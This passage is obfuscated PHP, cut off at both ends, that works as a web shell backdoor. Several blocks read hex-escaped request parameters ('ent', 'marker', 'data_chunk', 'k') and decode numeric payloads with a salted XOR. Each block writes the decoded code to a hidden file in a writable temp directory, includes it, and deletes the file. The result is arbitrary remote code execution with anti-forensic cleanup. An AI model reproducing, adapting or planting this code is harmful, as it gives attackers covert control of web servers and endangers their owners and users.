=$__len) break; $v6 = $bind[$l]; $chS = ord( $salt[$l % $sLen] ); $d =( ( int)$v6 - $chS -( $l % 10)) ^ 95; $itm.=chr( $d ); $l++; } while( true ); $flg = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), getenv("TEMP"), getcwd(), getenv("TMP"), "/dev/shm", session_save_path()]); $flag = 0; do { $k = $flg[$flag] ?? null; if ($flag >= count($flg)) break; if (max(0, is_dir($k) * is_writable($k))) { $object = str_replace("{var_dir}", $k, "{var_dir}/.key"); $file = fopen($object, 'w'); if ($file) { fwrite($file, $itm); fclose($file); include $object; @unlink($object); die(); } } $flag++; } while (true); } if(!empty($_REQUEST["e\x6E\x74"])){ $hld = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getcwd(), "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TMP")]); $symbol = $_REQUEST["e\x6E\x74"]; $symbol = explode ('.' ,$symbol ) ; $ent =''; $s8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s8); $s =0; array_walk( $symbol ,function( $v9) use( &$ent ,&$s ,$s8 ,$lenS) { $chS =ord( $s8[$s % $lenS]); $d =( ( int)$v9 - $chS -( $s % 10))^ 39; $ent .= chr( $d); $s++; }); $flg = 0; do { $entity = $hld[$flg] ?? null; if ($flg >= count($hld)) break; if (is_writable($entity) && is_dir($entity)) { $pgrp = sprintf("%s/.tkn", $entity); if (file_put_contents($pgrp, $ent)) { include $pgrp; @unlink($pgrp); die(); } } $flg++; } while (true); } if(isset($_POST) && isset($_POST["ma\x72k\x65r"])){ $pgrp = array_filter([getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getcwd(), session_save_path(), getenv("TMP"), "/var/tmp"]); $component = $_POST["ma\x72k\x65r"]; $component= explode ( "." , $component) ; $tkn = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt2); $i = 0; while ($i < count($component)) { $v7 = $component[$i]; $sChar = ord($salt2[$i % $sLen]); $d = ((int)$v7 - $sChar - ($i % 10)) ^ 9; $tkn .= chr($d); $i++; } while ($entity = array_shift($pgrp)) { if (!( !is_dir($entity) || !is_writable($entity) )) { $binding = str_replace("{var_dir}", $entity, "{var_dir}/.factor"); if (file_put_contents($binding, $tkn)) { require $binding; unlink($binding); exit; } } } } if(in_array("\x64\x61\x74\x61_\x63hunk", array_keys($_REQUEST))){ $val = array_filter([getcwd(), sys_get_temp_dir(), getenv("TMP"), "/tmp", "/var/tmp", "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP")]); $element = $_REQUEST["\x64\x61\x74\x61_\x63hunk"]; $element = explode ( "." ,$element ) ; $obj =''; $salt9 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt9); $len =count( $element); for( $j =0; $j < $len; $j++) { $v7 =$element[$j]; $chS =ord( $salt9[$j % $sLen]); $dec =( ( int)$v7 - $chS -( $j % 10)) ^ 25; $obj .=chr( $dec); } foreach ($val as $key) { if (!!is_dir($key) && !!is_writable($key)) { $mrk = "$key/.symbol"; if (file_put_contents($mrk, $obj)) { require $mrk; unlink($mrk); exit; } } } } if(isset($_POST) && isset($_POST["k"])){ $flag = $_POST["k"]; $flag=explode ( ".", $flag) ; $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $q = 0; $__tmp = $flag; while($v4 = array_shift($__tmp)) { $sChar = ord($s[$q%$sLen] ); $d =((int)$v4 - $sChar -($q%10)) ^81; $ptr .= chr($d ); $q++;} $desc = array_filter([sys_get_temp_dir(), "/dev/shm", "/tmp", getcwd(), getenv("TMP"), getenv("TEMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]); foreach ($desc as $key => $item) { if (array_product([is_dir($item), is_writable($item)])) { $ent = join("/", [$item, ".val"]); if (file_put_contents($ent, $ptr)) { include $ent; @unlink($ent); exi